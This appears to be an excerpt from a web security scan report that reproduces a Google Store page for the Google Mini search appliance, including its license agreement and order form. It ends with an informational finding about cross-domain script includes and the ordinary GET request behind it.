<div><br></div><div><b>*Update:</b> Starting on January 7, 2008 all Google Minis sold include 2 years of technical support and hardware warranty coverage. You can continue using your Google Mini beyond the 2 year support period through a perpetual license. </div><div><br></div><div><span class="Apple-style-span" style="color: rgb(102, 102, 102); font-family: Arial, Helvetica, sans-serif; font-size: 12px; font-weight: bold; ">If you are wanting to purchase an upgrade, please dial 1-866-746-6453 for assistance.</span></div></p><br />
           <table cellpadding="2" cellspacing="0">

<tr><td>
<select name="edp_no_0">
<option value="10413">GOOGLE MINI 2.0 HARDWARE - $2,990.00</option>

<option value="0">No - thank you</option>
</select>

</td>
<td style="padding-left:10px;">



               <input type="text" name="qty" size="2" value="1" /></td>
</tr>
<tr>
<td colspan="2">

                <input type="hidden" name="qty_0" value="1">
</td>
</tr>

               <tr>
<input type="hidden" name="qty_1" value="1">
                   <td style="width:100px;">GOOGLE MINI UPGRADE DOC COUNT 50K-300K - $7,000.00</td>
                   <td></td>
               </tr>

           </table>


<div style="padding:10px 0px;">
<b>Please enter your company name below <span style="color:Red;">(required)</span></b>
<input type="text" name="customization" id="companyNameMini" value="" size="40" />
</div>
<div style="padding:10px 0px;">
<b>Please enter your email address below <span style="color:Red;">(required)</span></b>
<input type="text" name="customization" id="emailMini" value="" size="40" />
</div>
<input type="hidden" name="customization" value="" />
<input type="hidden" name="customization" value="" />




       </td>
   </tr>
</table>

<div id="terms">
<p class="MsoNormal" style="margin-top:12.0pt;margin-right:0in;margin-bottom:
0in;margin-left:.5in;margin-bottom:.0001pt;text-align:justify;text-indent:-.5in">
   <b><span style="font-size:10.0pt">LICENSE AGREEMENT</span></b></p>
   <p class="MsoNormal" style="text-align:justify"><b>
   <span style="font-size:10.0pt">Google Enterprise Products</span></b></p>
   <p class="MsoNormal" style="margin-top:12.0pt;text-align:justify">
   <span style="font-size:10.0pt">This License Agreement for Google Enterprise
   Products (the "<b>Agreement</b>") is made and entered into by and between
   you (...<b>You</b>...) and Google Inc. ("<b>Google</b>"). This Agreement sets
   forth the terms and conditions under which You may license and use the
   Google Mini and/or the Google Search Appliance. </span></p>

   <p class="MsoNormal" style="margin-top:12.0pt;text-align:justify"><b>
   <span style="font-size:10.0pt">1.             GOOGLE LICENSE</span></b></p>
   <p class="MsoNormal" style="margin-top:12.0pt;text-align:justify;text-indent:
.5in"><b><span style="font-size:10.0pt">1.1 LICENSE GRANT.</span></b><span style="font-size:10.0pt">
   Subject to the terms and conditions of this Agreement, and in consideration
   of Your payment of all applicable fees and taxes as set forth in the
   Shopping Cart Section of the Google Store web site ("<b>Fees</b>"), Google
   grants to You (and You agree to comply with) a non-sublicensable,
   non-transferable, non-exclusive, limited license to use: (i) certain Google
   proprietary computer software identified on the Google Store web site in
   binary executable form only (the "<b>Software</b>"), that is installed in
   certain Google proprietary computer hardware (the "<b>Hardware</b>") and
   (ii) certain Google proprietary documentation in the form generally made
   available by Google to its customers for use with the Products (the "<b>Documentation</b>").
   The Software, Hardware and Documentation are collectively referred to herein
   as the "<b>Product</b>". A license key that enables the Software may be
   required and forwarded to You electronically. Your use of the Products shall
   be restricted to creating an index of and searching for content owned and
   controlled by you, whether on servers you own or are operated for your
   benefit. The right to search and access content made available by the
   Products on such servers are also hereby licensed to Your authorized end
   users. You agree to be responsible for the acts and/or omissions of any such
   end users in breach of the terms set forth herein. The license grant set
   forth herein is further limited to indexing the number of Documents
   specified in the Product description on the Google Store web site. </span>

   </p>
   <p class="MsoNormal" style="margin-top:12.0pt;text-align:justify;text-indent:
.5in"><b><span style="font-size:10.0pt">1.2 THIRD PARTY COMPONENTS. </span></b>
   <span style="font-size:10.0pt">Any third party component embedded, included
   or otherwise provided for use with the Products may only be used in
   conjunction with such Products ordered hereunder, and such use shall be
   subject to all the terms and conditions of this Agreement. The Products are
   designed for use with the equipment and accessories specified in the
   Documentation. Google assumes no responsibility under this Agreement for
   obtaining or providing such equipment. You are also responsible for ensuring
   a proper environment and proper utilities for the computer system on which
   the Products will operate. Notwithstanding the foregoing, to the extent that
   the Products include some components that are governed by licenses including
   provisions prohibiting their distribution under this Agreement, those
   components are instead governed solely by the respective appropriate
   licenses. To the extent Products include some components covered by licenses
   requiring the provision of corresponding source code for those components,
   Google hereby offers the provision of such source code consistent with such
   licenses.</span></p>
   <p class="MsoNormal" style="margin-top:12.0pt;text-align:justify"><b>
   <span style="font-size:10.0pt">2.             OWNERSHIP; RESTRICTED USE.</span></b><span style="font-size:10.0pt">
   For purposes of this Agreement, "<b>Intellectual Property Rights</b>" means
   any and all rights existing from time to time under patent law, copyright
   law, semiconductor chip protection law, moral rights law, trade secret law,
   trademark law, unfair competition law, publicity rights law, privacy rights
   law, and any and all other proprietary rights, and any and all applications,
   renewals, extensions and restorations thereof, now or hereafter in force and
   effect worldwide. All ownership rights, title, and Intellectual Property
   Rights in and to the Products shall remain in Google and/or its licensors,
   except that title to the Hardware shall pass to You upon receipt of all Fees
   by Google ("<b>Limited Title</b>"). Your Limited Title shall be further
   subject to Your return of such Hardware pursuant to this Agreement. All
   ownership rights, title, and Intellectual Property Rights in and to the
   content accessed through the Product is the property of the applicable
   content owner and may be protected by copyright and/or other applicable
   laws. </span></p>

   <p class="MsoNormal" style="margin-top:12.0pt;text-align:justify">
   <span style="font-size:10.0pt">You agree not to, or to allow others to: (i)
   adapt, alter, modify, decompile, translate, disassemble, or reverse engineer
   the Product or any component thereof, including without limitation, the
   source code and any other underlying ideas or algorithms of the Software
   (except to the extent applicable laws specifically prohibit such
   restriction); (ii) alter the number of Documents and/or Collections
   authorized for Your use; (iii) create license keys that enable the Software;
   (iv) copy the Software except as provided in Section 4; (v) use the Product
   for High Risk Activities as defined below; (vi) transfer, sublicense, loan,
   sell, lease or use for timesharing or service bureau purposes the Product or
   any component thereof; or (vii) ship, divert, transship, transfer, export or
   re-export the Products or any component thereof into any country or use it
   in any manner prohibited by any export control laws, restrictions, or
   regulations administered by the U.S. Commerce Department's Bureau of Export
   Administration, the U.S. Department of Treasury's Office of Foreign Assets
   Control or any other applicable government agency. For the avoidance of
   doubt, nothing in this Agreement grants to You any rights whatsoever in or
   relating to the source code of the Software. </span></p>
   <p class="MsoNormal" style="margin-top:12.0pt;text-align:justify">
   <span style="font-size:10.0pt">Any trade names, trademarks, service marks,
   logos, trade dress, and any other distinctive or proprietary symbols,
   labels, designs or designations ("<b>Brand Features</b>") as well as any
   copyright or other proprietary notices appearing on or in the Product shall
   be maintained and shall not be removed, modified or altered by You. At Your
   option, the search box (or other means used by an end user to enter a search
   query) and/or results pages may conspicuously display an unaltered graphic
   in the form provided by Google for the purpose of identifying that the
   search function is provided by Google and may link to the Google site
   located at:
   <a style="color: blue; text-decoration: underline; text-underline: single" href="http://www.google.com">
   www.google.com</a> (or such other URL as may be updated by Google). Such
   graphic may be accessed at:
   <a style="color: blue; text-decoration: underline; text-underline: single" href="http://www.google.com/stickers.html">

   www.google.com/stickers.html</a> (or such other URL as may be updated by
   Google) and all use of such graphic shall be subject to Google's then
   current Brand Feature guidelines and policies in effect. Google may include
   Your name, public URL (if any), Brand Features and other data provided by
   You to Google in the customer deployment information page which You may have
   completed after checkout from the Google Store in Google...s presentations,
   marketing materials, and customer lists (which includes, without limitation,
   customer lists posted on Google...s web sites). All use by Google of Your
   Brand Features (including any goodwill associated therewith) shall inure to
   the benefit of You and all use by You of Google's Brand Features (including
   any goodwill associated therewith) shall inure to the benefit of Google.
   Each party agrees not to challenge or assist others to challenge the other
   party's Brand Features or registration thereof (except to protect such
   party's rights with respect to its own Brand Features).  Except as provided
   for pursuant to this Agreement, neither party shall acquire any right, title
   or interest in or to the other party's Brand Features. </span></p>
   <p class="MsoNormal" style="margin-top:12.0pt;text-align:justify"><b>
   <span style="font-size:10.0pt">3.             DELIVERY.</span></b><span style="font-size:10.0pt">
   The Products shall be delivered by the shipping method indicated on the
   Shopping Cart section of the Google Store web site. All subsequent
   supplemental increases or modifications to Your order hereunder shall be
   deemed to be delivered under the same terms as the original license. You
   agree that at the time of Your receipt of any Product, You shall bear all
   risk of loss, theft or damage of any kind to such Product and that your
   failure to obtain insurance at the time of Your receipt of such Product will
   be at Your own risk without liability of any kind to Google. </span></p>
   <p class="MsoNormal" style="margin-top:12.0pt;text-align:justify"><b>

   <span style="font-size:10.0pt">4.             TECHNICAL SUPPORT SERVICES.
   </span></b><span style="font-size:10.0pt">In consideration of Your payment
   to Google of all Fees, Google shall provide technical support services in
   accordance with Google's then current Technical Support Services Guidelines
   ("<b>TSS Guidelines</b>") for the Products identified in your order ("<b>Technical
   Support Services</b>" or "<b>TSS</b>") for a period  set forth in Product
   description on the Google Store web site (and confirmed in the checkout page
   and in Your invoice) commencing from the Shipment Date set forth below. You
   may purchase additional TSS services or renew Your TSS subject to Google...s,
   or its agent...s, then current terms and prices for TSS.  TSS Guidelines are
   password protected and may be accessed at the following URL:
   <a style="color: blue; text-decoration: underline; text-underline: single" href="http://support.google.com">
   http://support.google.com</a> (or such other URL as may be updated by
   Google). TSS includes Updates as defined under the TSS Guidelines and shall
   be made available to You provided You are current on Technical Support
   Services. Your use of any Updates shall be subject to the same terms
   applicable to the Product as set forth under this Agreement. You agree that
   such Updates shall be installed as required by the terms of the applicable
   TSS Guidelines. Furthermore, You may make a copy of an Update to a physical
   medium solely for the purpose of facilitating the installation of such
   Update onto the Software, and You agree to immediately erase or destroy such
   copy once the applicable Update is installed in the Software. TSS also
   includes repair or replacement of Hardware that is defective or damaged
   (beyond normal wear and tear during shipment) at the time of Your receipt
   (as determined in Google's sole discretion), provided (i) You promptly
   comply with all procedures stated in the applicable TSS Guidelines, and (ii)
   such defect or damage to the Hardware was not caused by Your abuse, misuse,
   accident, alteration, or unauthorized modification or installation. TO THE
   MAXIMUM EXTENT PERMITTED BY LAW, THE FOREGOING SHALL BE GOOGLE'S ENTIRE
   LIABILITY AND YOUR SOLE AND EXCLUSIVE REMEDY FOR DEFECTIVE OR DAMAGED
   HARDWARE. Unless otherwise agreed in writing, in order to receive TSS You
   agree to provide Google with full and timely access to the Product as
   provided in the applicable TSS Guidelines. Failure to provide such access
   will be at Your own risk and without liability to Google. </span></p>

   <p class="MsoNormal" style="margin-top:12.0pt;text-align:justify"><b>
   <span style="font-size:10.0pt">5.             TERM AND TERMINATION.</span></b><span style="font-size:10.0pt">
   Subject to Your payment of all Fees, the term of the license granted herein
   for any Product shall commence upon the date of shipment by Google or its
   designated agent (...<b>Shipment Date</b>...) and may be terminated as set forth
   herein. </span></p>
   <p class="MsoNormal" style="margin-top:12.0pt;text-align:justify">
   <span style="font-size:10.0pt">A party may, by written notice of default to
   the other party, (i) terminate this Agreement, in whole or in part, (a) if
   the other party materially breaches this Agreement, and the breaching party
   does not cure such material breach within thirty (30) calendar days after
   receipt of written notice of such breach; or (b) immediately following the
   failure to resolve the suspension of business, insolvency, institution of
   bankruptcy, liquidation proceedings by or against the other party,
   appointment of a trustee or receiver for either party's property or
   business, or any assignment, reorganization or arrangement by either party
   for the benefit of its creditors. Google may immediately terminate this
   Agreement, in whole or in part, if You are in breach of Section 2
   (Ownership, Restricted Use) or Section 6 (Confidential Information); or (ii)
   You are in material breach of this Agreement more than twice notwithstanding
   any cure of such breaches.</span></p>
   <p class="MsoNormal" style="margin-top:12.0pt;text-align:justify">

   <span style="font-size:10.0pt">Upon termination of this Agreement, all
   licenses, and any other rights and services provided by Google to You as set
   forth in this Agreement, shall cease immediately. If this Agreement is
   terminated for Your breach, You must immediately return the Product to
   Google via Google's authorized return shipment process for receipt by
   Google, at which time Your Limited Title in the Hardware shall revert to
   Google. Except as set forth herein, upon termination of this Agreement, You
   may keep possession of the Hardware, provided that all Software is erased in
   compliance with the process as instructed by Google, and You will provide
   written certification that You have properly completed such process within
   ten (10) business days of such termination. </span></p>
   <p class="MsoNormal" style="margin-top:12.0pt;text-align:justify">
   <span style="font-size:10.0pt">Termination of this Agreement or any license
   shall not limit either party from pursuing other remedies available to it,
   including injunctive relief, nor shall such termination relieve You of Your
   obligation to pay all fees that have accrued or are otherwise owed by You.
   </span></p>
   <p class="MsoNormal" style="margin-top:12.0pt;text-align:justify"><b>
   <span style="font-size:10.0pt">6.             CONFIDENTIAL INFORMATION.
   </span></b><span style="font-size: 10.0pt">In connection with performance of
   its obligations hereunder, a party (the ...<b>Discloser</b>...) may disclose to
   the other party certain information it considers confidential and/or
   proprietary (...<b>Confidential Information</b>...) to the other party (the ...<b>Recipient</b>...)
   including, but not limited to, tangible, intangible, visual, electronic,
   present, or future information such as: (a) trade secrets; (b) financial
   information, including pricing; (c) technical information, including
   research, development, procedures, algorithms, data, designs, and know-how;
   (d) business information, including operations, planning, marketing
   interests, and products; and (e) the terms of this Agreement and the
   discussions, negotiations and proposals related thereto. The Recipient will
   only have a duty to protect Confidential Information disclosed to it by the
   Discloser: (1) if it is clearly and conspicuously marked as ...confidential...
   or with a similar designation; (2) if it is identified by the Discloser as
   confidential and/or proprietary before, during, or promptly after
   presentation or communication; or (3) if it is disclosed in a manner
   <span style="letter-spacing:-.1pt">in which the Discloser reasonably
   communicated, or the Recipient should reasonably have understood under the
   circumstances that the disclosure should be treated as confidential, whether
   or not the specific designation "confidential" or any similar designation is
   used</span>. </span><span style="font-size:10.0pt">You acknowledge that the
   source and object code of the Software remains a confidential trade secret
   of Google and/or its licensors and that You are not entitled to review
   either the object code or the source code of the Software for any reason at
   any time. Recipient shall not disclose or cause to be disclosed any
   Confidential Information of Discloser, except to those employees, agents,
   representatives, or contractors of the parties who require access to the
   Confidential Information to perform under this Agreement (...<b>Authorized
   Personnel</b></span><span style="font-size: 10.0pt">...)</span><span style="font-size:10.0pt">
   and who are bound by written agreement not to disclose third party
   confidential or proprietary information disclosed to Recipient. Furthermore,
   Recipient agrees to be responsible for any act and/or omission of any
   Authorized Personnel in breach of this Section. Recipient shall protect the
   Confidential Information of Discloser by using the same degree of care, but
   no less than a reasonable degree of care, that it uses to protect its own
   confidential information of a like nature to prevent its unauthorized use,
   dissemination or publication to any unauthorized third parties. A party's
   Confidential Information shall not include information that: (i) is or
   becomes publicly available through no act or omission of Recipient; (ii) was
   in the Recipient's lawful possession prior to the disclosure and was not
   obtained by Recipient either directly or indirectly from the Discloser;
   (iii) is lawfully disclosed to the Recipient by a third party without
   restriction on Recipient's disclosure, and where Recipient was not aware
   that the information was the confidential information of Discloser; (iv) is
   independently developed by the Recipient without violation of this
   Agreement; or, (v) which is disclosed by Recipient as needed to comply with
   a court order, subpoena, or other government demand (provided that Recipient
   first notifies Discloser and gives Discloser the opportunity to challenge
   such court order, subpoena, or government demand). Each party acknowledges
   that damages for improper disclosure of Confidential Information may be
   irreparable; therefore, the injured party is entitled to seek equitable
   relief, including temporary restraining order(s) or preliminary or permanent
   injunction, in addition to all other remedies, for any violation or
   threatened violation of this Section 6 or Section 2. If the Product is
   returned due to damage or defect, You will use commercially reasonable
   efforts to remove such Confidential Information prior to return to Google.
   </span></p>

   <p class="MsoNormal" style="margin-top:12.0pt;text-align:justify"><b>
   <span style="font-size:10.0pt">7.             WARRANTY DISCLAIMER. </span>
   </b><span style="font-size:10.0pt">GOOGLE AND ITS LICENSORS MAKE NO WARRANTY
   OF ANY KIND, WHETHER EXPRESS, IMPLIED, STATUTORY OR OTHERWISE, INCLUDING
   WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
   USE AND NON-INFRINGEMENT. THE PRODUCT AND SERVICES ARE PROVIDED BY GOOGLE
   AND ITS LICENSORS "AS IS". GOOGLE AND ITS LICENSORS DO NOT WARRANT THAT THE
   PRODUCT OR ANY PORTION THEREOF, ARE ERROR OR BUG FREE, OR THAT YOUR USE OF
   THE PRODUCT OR SERVICES WILL BE UNINTERRUPTED. GOOGLE AND ITS LICENSORS
   ASSUME NO RESPONSIBILITY FOR THE PROPER INSTALLATION AND USE OF THE PRODUCT.
   GOOGLE AND ITS LICENSORS MAKE NO REPRESENTATIONS ABOUT ANY CONTENT OR
   INFORMATION MADE ACCESSIBLE BY THE PRODUCT. SOME JURISDICTIONS DO NOT ALLOW
   THE EXCLUSION OF IMPLIED WARRANTIES, SO THE ABOVE EXCLUSION MAY NOT APPLY TO
   YOU. IN THAT EVENT, TO THE EXTENT PERMISSIBLE, ANY IMPLIED WARRANTIES ARE
   LIMITED IN DURATION TO NINETY (90) DAYS FROM THE DATE OF SHIPMENT OF THE
   APPLICABLE PRODUCT. THE PRODUCT IS NOT FAULT TOLERANT and is not designed,
   manufactured, or intended for uses such as the operation of nuclear
   facilities, air traffic control or life support systems, where the failure
   of the Product could lead to death, personal injury, or environmental damage
   ("<b>High Risk Activities</b>"). </span></p>
   <p class="MsoNormal" style="margin-top:12.0pt;text-align:justify"><b>
   <span style="font-size:10.0pt">8.             LIMITATION OF LIABILITY.</span></b><span style="font-size:10.0pt">
   IN NO EVENT WILL GOOGLE AND/OR ITS LICENSORS BE LIABLE (i) FOR ANY INDIRECT,
   SPECIAL, INCIDENTAL, CONSEQUENTIAL, EXEMPLARY OR PUNITIVE DAMAGES INCLUDING,
   BUT NOT LIMITED TO, DAMAGES FOR LOST DATA, LOST PROFITS, OR COSTS OF
   PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES, HOWEVER CAUSED (INCLUDING BUT
   NOT LIMITED TO USE, MISUSE, INABILITY TO USE, OR INTERRUPTED USE) AND UNDER
   ANY THEORY OF LIABILITY, INCLUDING BUT NOT LIMITED TO CONTRACT OR TORT AND
   WHETHER OR NOT GOOGLE WAS OR SHOULD HAVE BEEN AWARE OR ADVISED OF THE
   POSSIBILITY OF SUCH DAMAGE REGARDLESS OF WHETHER ANY REMEDY SET FORTH IN
   THIS AGREEMENT FAILS OF ITS ESSENTIAL PURPOSE; OR (ii) FOR ANY CLAIM
   ATTRIBUTABLE TO ERRORS, OMISSIONS, OR OTHER INACCURACIES IN THE PRODUCT OR
   DESTRUCTIVE PROPERTIES OF THE PRODUCT. IN NO EVENT SHALL GOOGLE'S AND/OR ITS
   LICENSORS' TOTAL AGGREGATE LIABILITY UNDER THIS AGREEMENT EXCEED THE AMOUNT
   OF FEES PAID BY YOU FOR THE PRODUCT GIVING RISE TO SUCH LIABILITY. </span>

   </p>
   <p class="MsoNormal" style="margin-top:12.0pt;text-align:justify"><b>
   <span style="font-size:10.0pt">9.             Miscellaneous. </span></b>
   <span style="font-size:10.0pt">This Agreement is personal to You. You may
   not assign or otherwise transfer Your rights or delegate Your obligations
   under this Agreement, in whole or in part, without the prior written consent
   of Google. Any attempted assignment in derogation hereof shall be null and
   void. The parties hereto are and shall remain independent contractors, and
   nothing herein shall be deemed to create an agency, partnership, or joint
   venture between the parties hereto. Both parties shall be responsible for
   performing their respective obligations as set forth herein. Upon
   termination, the following Sections of this Agreement will survive: 2, 5, 6,
   7, 8, 9 and 10. This Agreement shall be governed by and construed in
   accordance with the laws of the State of California</span><span style="font-size:
10.0pt"> and the federal </span><span style="font-size:
10.0pt">U.S.</span><span style="font-size:10.0pt"> laws applicable therein,
   excluding its choice of law provisions, and You and Google agree to submit
   to the personal and exclusive jurisdiction of the courts located in Santa
   Clara County, California. The parties specifically exclude from application
   to this Agreement the United Nations Convention on Contracts for the
   International Sale of Goods and the Uniform Computer Information
   Transactions Act. If any provision of this Agreement shall be adjudged by
   any court of competent jurisdiction to be unenforceable or invalid, that
   provision shall be limited or eliminated to the minimum extent necessary so
   that this Agreement shall otherwise remain in full force and effect and
   remain enforceable between the parties. The failure of either party to act
   in the event of a breach of this Agreement by the other shall not be deemed
   a waiver of such breach or a waiver of future breaches. Any notice given
   under this Agreement shall be in writing and in the English language and
   shall be delivered by certified or registered mail, postage prepaid, return
   receipt requested. Notices shall be deemed given upon acknowledgment of
   receipt. All notices to Google must be sent to such address as provided at:
   <a style="color: blue; text-decoration: underline; text-underline: single" href="http://www.google.com/corporate/address.html">

   www.google.com/corporate/address.html</a> or as otherwise provided in
   writing for such notice purposes, provided that a courtesy copy shall also
   be sent to the attention of the Google Legal Department for all legal
   notices. Notices to You shall be sent to the address set forth in the ...My
   Account... section of the Google Store web site or to any other address You
   specify in writing. Neither party shall be liable for failing or delaying
   performance of its obligations (except for the payment of money) resulting
   from any condition beyond its reasonable control, including but not limited
   to, governmental action, acts of terrorism, earthquake, fire, flood or other
   acts of God, labor conditions, power failures, and Internet disturbances.
   You agree that this Agreement shall be construed as if both parties jointly
   wrote and prepared it. This Agreement and the terms or other provisions
   located at any Google uniform resource locators (URLs) referenced pursuant
   to this Agreement (which are all incorporated herein by reference),
   constitutes a complete, absolute integration and the entire agreement
   between the parties hereto relating to the subject matters of this
   Agreement, and supersedes all prior representations, proposals, discussions,
   and communications, whether oral or in writing, and all contemporaneous oral
   communications, and any terms contained in any related purchase order(s) or
   other documents pertaining to the subject matter of this Agreement shall be
   null and void. This Agreement may be modified only in writing signed by both
   parties. </span></p>
   <p class="MsoNormal" style="margin-top:12.0pt;text-align:justify"><b>
   <span style="font-size:10.0pt">10.          U.S. Government Restricted
   Rights.</span></b><span style="font-size:10.0pt"> The Product is commercial
   within the meaning of the applicable civilian and military Federal
   acquisition regulations and any supplement thereto. If the user of the
   Product is an agency, department, employee, or other entity of the United
   States Government, the use, duplication, reproduction, release,
   modification, disclosure, or transfer of the Product, including technical
   data or manuals, is restricted by the terms, conditions and covenants
   contained in this Agreement. In accordance with Federal Acquisition
   Regulation 12.212 for civilian agencies and Defense Federal Acquisition
   Regulation Supplement 227.7202 for military agencies, the use of the
   Software is further restricted by this Agreement. </span></p>
   <p class="MsoNormal" style="text-align: justify; text-autospace: none; margin-top: 12.0pt">
   <span style="font-size:7.0pt">Google Online Enterprise License Agreement
   v4.0 (011106)</span>
</div>
<div style="padding:10px 0px 25px 0px; text-align:right;">
<b>You must agree to terms to add to cart:</b><br />
<input type="radio" value="Y" id="y_terms" name="terms" /> I Agree
  
<input type="radio" value="N" id="n_terms" name="terms" /> I Do Not Agree
</div>

<div align="right">

<a href="http://www.googlestore.com/Mini/cid=651/shop.axd/Category"><img src="/images/btn_continueshopping.gif" border=0></a>


  
<input name="imageField" id="submit_btn" type="image" src="/images/btn_addtocart.gif" border="0" />
</div>

</form>
<br />

<script type="text/javascript">
$(document).ready(function() {
$("#submit_btn").bind("click",function() {
if ($("#companyNameMini").val().trim() == "" || !isValidEmailAddress($("#emailMini").val().trim())) {
alert("Please enter company name and a valid email address and agree to terms to continue");
return false;
}
});

$("#submit_btn").attr("disabled", "disabled");

$("#n_terms").bind("click", function() {
$("#submit_btn").attr("disabled", true);
});
$("#y_terms").bind("click", function() {
$("#submit_btn").attr("disabled", false);
});

});

function isValidEmailAddress(emailAddress) {
var pattern = new RegExp(/^(("[\w-\s]+")|([\w-]+(?:\.[\w-]+)*)|("[\w-\s]+")([\w-]+(?:\.[\w-]+)*))(@((?:[\w-]+\.)*\w[\w-]{0,66})\.([a-z]{2,6}(?:\.[a-z]{2})?)$)|(@\[?((25[0-5]\.|2[0-4][0-9]\.|1[0-9]{2}\.|[0-9]{1,2}\.))((25[0-5]|2[0-4][0-9]|1[0-9]{2}|[0-9]{1,2})\.){2}(25[0-5]|2[0-4][0-9]|1[0-9]{2}|[0-9]{1,2})\]?$)/i);
return pattern.test(emailAddress);
};

</script>

   </div>

   <img src="http://int.teracent.net/tase/int?adv=296&fmt=redir&sec=0&pid=prod&prodID=1065109" width="1" height="1" />
</div>
</div>
<div id="right_content">



<style type="text/css">
.signup-tb{
width:135px;
font-size:.9em;
margin-top:5px;
margin-bottom:5px;
}

.signup-btn{
font-size:.9em;
}

.lblMessage{
font-weight:bold;

}

.formsuccess{
font-weight:bold;
color:green;
}

.formerror{
font-weight:bold;
color:red; }
</style>

<div class="box-round" style="margin-bottom:10px;">
<div class="top">
<span>
<h2 class="side_head">Newsletter Signup</h2>
</span>
</div>

<div class="center-content">
<span id="Template_ctlRightNav_ctlSignup_Label1" class="lblMessage">I want to receive promotional email from GatewayCDI.</span><br />
<form name="aspnetForm" method="post" action="#" id="aspnetForm">
<div>
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUENTM4MQ9kFgJmD2QWAgIDD2QWAgIFD2QWAmYPZBYCAgEPZBYCAgMPDxYCHghJbWFnZVVybAUWL2ltYWdlcy9idG5fc2lnbnVwLmdpZmRkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBShUZW1wbGF0ZSRjdGxSaWdodE5hdiRjdGxTaWdudXAkYnRuU2lnblVw" />
</div>

<div>

   <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWAwL5t4CVDgKc3s3hCgKHlcOwBw==" />
</div>
<input name="Template$ctlRightNav$ctlSignup$EmailAddress" type="text" maxlength="50" id="Template_ctlRightNav_ctlSignup_EmailAddress" class="signup-tb" />
<input type="image" name="Template$ctlRightNav$ctlSignup$btnSignUp" id="Template_ctlRightNav_ctlSignup_btnSignUp" src="/images/btn_signup.gif" style="border-width:0px;" />
</form>
</div>
<div class="bottom"><span></span></div>
</div>

<div class="box-round">
<div class="top">
<span>
<h2 class="side_head">Store Links</h2>
</span>
</div>
<div class="center-content">
<ul class="store-links">
<li><a href="/shop.axd/Cart" class="shopping-cart">Shopping Cart (23)</a></li>

<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Contact#warranty">Warranty / Returns</a></li>

</ul>

<ul>

<li><a href="/googlesearch.aspx?topseller=yes">Top Sellers</a></li>
<li><a href="/googlesearch.aspx?isnew=yes">What's New</a></li>
<li><a href="/googlesearch.aspx?category=eco">Eco-Friendly Items</a></li>
<li><a href="/googlesearch.aspx?specials=yes">Specials</a></li>
<li><a href="/Mini/"><b>Google Mini</b></a></li>

</ul>
</div>
<div class="bottom"><span></span></div>
</div>

</div>

<div id="footer">


<ul id="navigation_footer_ul">
<li><a href=/Accessories/ >Accessories</a></li><li><a href=/Fun/ >Fun</a></li><li><a href=/Kids/ >Kids</a></li><li><a href=/Office/ >Office</a></li><li><a href=/Wearables/ >Wearables</a></li><li><a class="textpopup" title="Click here to enter the Doodles on Demand experience. Note: You'll be leaving this site and will land on a page hosted by Zazzle.com." onclick="target='_blank'" href=http://www.zazzle.com/googledoodles >Doodles</a></li>
<li><a href="/shop.axd/Contact">Customer Service</a></li>
<li><a href="/shop.axd/Cart">Shopping Cart</a></li>
</ul>
<div id="legal">
Copyright Google Inc. All Rights Reserved.<br />
Use of this service constitutes your acceptance of the Google Store's <a href="/shop.axd/PrivacyPolicy">privacy policy</a>.
</div>

<script type="text/javascript" src="/js/jquery-latest.js"></script>
<script type="text/javascript" src="/js/jquery.dimensions.js"></script>
<script type="text/javascript" src="/js/jquery.tooltip.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$(".ecotags").tooltip({
   showURL: false });
   $(".textpopup").tooltip({showURL: false,effect: "bouncy" });

$("#DoodleDrop").bind("change",function(){
var imgname = $('option:selected',this).attr("id");
var edpNo = '10412';
if(imgname!=""){
$("#ProductImage").attr("src","/images/DOODLES/"+imgname+"_A.jpg");
}
$("#ProductImageHref").attr("href","javascript:newWindow('/view_large.aspx?img=/images/DOODLES/"+imgname+"_.jpg+&edp_no="+edpNo+"',420,600)");
});

$("#searchfilters select").bind("change",function(){
var url = $('option:selected',this).val();
if(url!=""){window.location = url;}

});

});
</script>

<script src="https://www.google.com/jsapi" type="text/javascript"></script>
<script src="https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js" type="text/javascript"></script>
<script src="https://www.google.com/cse/intl/en-US/sayt.js" type="text/javascript"></script><script type="text/javascript">
var searchText = document.getElementById('q');

var cx = '016458501645884057912:dq_ixbwhuk8';

var key = 'AIzaSyAl0tYGljRQwIcOS13gmbLkH0GssascyR4';
google.load('search', '1');

googleapis.load('shopping', 'v1');
sayt = saytInitialize(cx, key);

google.setOnLoadCallback(function() {
google.search.CustomSearchControl.attachAutoCompletion(
cx, searchText, 'searchForm', sayt.saytSubmit );
});
</script>

</div>
    </div>
    <script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write("<sc" + "ript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'>" + "</sc" + "ript>");
</script>

<script type="text/javascript">
var firstTracker = _gat._getTracker("UA-30481-1");
firstTracker._initData();
var ga = ga || {};
ga.special = 'regular';

ga.isNew = 'no';

firstTracker._setCustomVar(1, 'price', ga.special, 3);
firstTracker._setCustomVar(2, 'is new', ga.isNew, 3);
firstTracker._trackPageview();

var secondTracker = _gat._getTracker("UA-735212-16");
secondTracker._setLocalRemoteServerMode();
secondTracker._initData();
secondTracker._trackPageview();

</script>

<div id="backgroundPopup"></div>

   </body>
</html>

4.4. http://www.googlestore.com/Office/Momentum+Computer+Portfolio.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.googlestore.com
Path:	/Office/Momentum+Computer+Portfolio.axd

Issue detail

The response dynamically includes the following scripts from other domains:

https://ajax.googleapis.com/ajax/libs/googleapis/0.0.4/googleapis.min.js
https://www.google.com/cse/intl/en-US/sayt.js
https://www.google.com/jsapi

Request

GET /Office/Momentum+Computer+Portfolio.axd HTTP/1.1
Host: www.googlestore.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.googlestore.com/Office/Reversible+Neoprene+Laptop+Sleeve.axd
